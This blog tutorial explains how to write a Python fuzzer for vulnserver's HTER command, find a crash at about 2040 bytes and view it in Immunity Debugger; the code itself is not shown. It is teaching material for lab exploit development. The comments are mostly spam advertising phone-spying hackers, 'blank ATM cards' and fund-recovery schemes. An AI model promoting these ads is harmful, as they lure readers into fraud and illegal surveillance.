Monday, January 20, 2014

Fuzzing vulnserver with Python

A request from the forums was made asking about creating a custom fuzzer using Python. It's simple enough, but for posterity let's go through this process.


So, if we examined the kinds of input Peach was supplying to vulnserver when we fuzzed the HTER command in a previous post we see that it basically threw a bunch of junk input of varying sizes. In a very bad generalization, it's increasing the amount of junk to determine if it crashes the program. Fuzzing is a lot more complicated and nuanced than this obviously so check out this book or these links for further reading. 

Using Python to Fuzz

OK, but lets try and roll our own fuzzer in Python for the HTER command. If we recall the StateModel we created in our Peach Pit, the format of the HTER protocol was:
  1. Receive some data
  2. Send the HTER command with our input
  3. Receive some data

With this in mind, we know enough to go about creating our fuzzer in Python. The general flow is going to be:
  1. Create a connection to vulnserver
  2. Receive the banner for vulnserver, i.e. "Welcome to Vulnerable Server..."
  3. Send our fuzzed data in ever increasing amounts, i.e. "HTER <fuzzed input>
  4. Receive the response from vulnserver, i.e. "HTER RUNNING FINE"
  5. Increase the amount of fuzzed input
  6. Close the connection to vulnerserver
  7. Go back to step 1
  8. If we can't connect to vulnserver then we can guess that the previous input crashed vulnserver and we can print a message
Here's what this looks like in code:

Here's what the output looks like when running this script against an instance of vulnserver:

And we are greeted with this popup as well:

So we have a good indication that 2040 As will result in vulnserver crashing. Let's make a quick proof of concept from our fuzzer to test if 2040 As will crash vulnserver.

Not that complicated, but when we run it we get the popup that vulnserver.exe has crashed so we're on to something.

Viewing the Crash Under a Debugger

Just for fun, let's run vulnserver under Immunity Debugger and see what's going on under the covers when we run our proof of concept. You can get Immunity Debugger from here.
First we'll start Immunity. Then File > Open and select vulnserver.exe and then click the Open button. This spin up vulnserver, but pause it right before it hits the Program entry point. You should see on the bottom right hand side a yellow text box that says "Paused". Hit F9 or go to Debug > Run to start the program. That yellow text box saying "Paused" should now say "Running". Great, now we have vulnserver up and running so we can throw our proof of concept at it. Hopefully we should see some registers light up with As when we run it.
Once we execute our proof of concept we see at the bottom of Immunity that we've hit an exception.

And if we look at our registers we see that this particular crash didn't reveal anything too interesting.

It looks like we were able to overwrite most of EBP, but we didn't get a hold of anything else =/. Ohh well, from here we could start throwing 2030 As and so on to see if we get a better result.

Hope this helped.


  1. I like this site for it's comprehensive and extensive information best for programmers and or students. Thank you for sharing.

  2. Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.
    hotmail sign up login

  3. I faced a lot of problems with this. Fortunately, I have a friend who helped me with it. I think, I need to learn more about it.


  4. I really enjoy reading of your article. I wanted to inform you that you have people like me who appreciate your work.


  5. Confront your cheating spouse with evidence, i was able to spy on my cheating ex phone without finding really helped me during my divorce can contact BESTAPPSHACKERS@GMAIL.COM) call and text him whatsapp +1(602) 609-4730 for spying and hacking social networks, school servers, icloud and much more, viber chats hack, Facebook messages and yahoo messenger, calls log and spy call recording, monitoring SMS text messages remotely, cell phone GPS location tracking, spy on Whats app Messages, his services are AFFORDABLE .............179800

  6. If you are looking for a professional hacker to provide hacking solutions on

    -Social media hacks

    -Recovering Scammed funds

    -Email hacks

    -Phone hacks

    -DMV database

    -School result upgrading

    -Tracking & Finding People

    -Increased Credit score boost to 850

    - Access your spouse/partner social media, Monitor your colleague

    -Bitcoin mining, Lost Forex trading funds recovery, Lost Cryptocurrency trading funds recovery, Binary option funds recovery and a lot more, search no further.

    -Hunting Down Scammers With the help of, Federal Bureau of Investigation (FBI) and The International Criminal Police Organisation (INTERPOL)✅

    I fully recommend it to everyone, he recovered all data I had on a lost phone and helped in tracking the phone till it was found. I feel so happy writing this review about him, try him he's the best.


    visit their website to read more about them:

  7. I am Leah Hart I live in Ohio USA I’m 32 Years old, am so happy I got my blank ATM card from united hacking company  blank ATM card that can withdraw $5,500 daily. I got it from him  last week and now I have withdrawn about $15,000 for free. The blank ATM withdraws money from any ATM machines and there is no name on it because it is blank just your PIN will be on it, it is not traceable and now I have money for business, shopping and enough money for me and my family to live on.I am really glad and happy i met united hacking company  because I met Five persons before him and they could not help me. But am happy now united hacking company  sent the card through DHL and I got it in two days. Get your own card from him right now, he is giving it out for small fee to help people even if it is illegal but it helps a lot and no one ever gets caught or traced. I’m happy and grateful to the united hacking company   because he changed my story all of a sudden. The card works in all countries that is the good news contact. email address: 

  8. Finally I have been able to retrieve all my lost funds of about $35,000,which I never believed I would get again from 24options,they stocked my trading capital for over 3 months now, and denied me access to my trading account. I’m so glad that I have gotten back all my funds back without stress, All thanks to my neighbor who introduced me to a certified binary option recovery expert. Do you have funds that you wish to withdraw from your account, is your Broker manager asking you to make more deposit before you can place a withdrawal, have you lost money from any investment online? , are you confused and you don’t know how to go about ? Contact ( and also on Whats-app +1 (814)503-0528


    My name is Morgan Williams am from Alabama United State,this is so real and wonderful, at first i thought is a scam , because have been scam by several people claiming they can help me invest my money in bitcoin trading , that is how i lost my $25,000 last week on investment , but with the help of Mr Oscar White Blank ATM Card , i was able to withdraw $50,000 from ATM machine without trace more than the money i lost last week , indeed Mr Oscar your Blank ATM card is real and genuine , i will keep telling people about you as i promise to do , if you are in any financial problem to pay up bills and start up a new life , kindly contact Mr Oscar white on how you can obtain his Blank ATM card , he does not charge big , trust him and contact him today through email or whats-app +1(513)-299-8247.

  10. It’s really a cool and useful piece of info.